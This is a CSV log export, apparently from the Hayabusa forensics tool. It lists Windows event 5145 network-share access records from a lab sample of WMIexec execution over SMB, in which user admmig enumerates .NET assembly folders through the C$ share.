LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
